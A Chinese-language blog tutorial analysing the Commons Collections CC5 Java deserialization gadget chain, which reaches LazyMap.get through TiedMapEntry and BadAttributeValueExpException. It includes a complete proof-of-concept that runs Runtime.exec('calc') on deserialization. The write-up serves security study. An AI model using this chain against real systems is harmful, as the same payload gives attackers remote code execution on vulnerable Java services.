CC5链

发表于 更新于 分类于 阅读次数:

CC5

cc5的后半部分和之前是一样的,只是在调用LazyMap的get方法时,使用的是TiedMapEntrytoString方法,相当于是提供了一个新的入口

CC5攻击链分析

调用get

这里TiedMapEntry的同toString方法调用了getValue方法,而getValue方法调用了map的get方法

1
2
3
4
5
6
7
8
// TiedMapEntry toString
public String toString() {
        return getKey() + "=" + getValue();
    }

public Object getValue() {
        return map.get(key);
    }

只需要将lazyMap放入TiedMapEntry中,然后调用其toString方法即可

1
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 1);

调用toString

<font style="color:rgb(50, 50, 50);">BadAttributeValueExpException</font>readObject方法中,会调用传入类的toString方法,这里非常简单,也是只需要将TiedMapEntry传入<font style="color:rgb(50, 50, 50);">BadAttributeValueExpException</font>中即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val= valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString();
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
    }

最终代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map, chainedTransformer);
        
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 1);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);

        serialize(badAttributeValueExpException);
        unserialize("ser.bin");

    }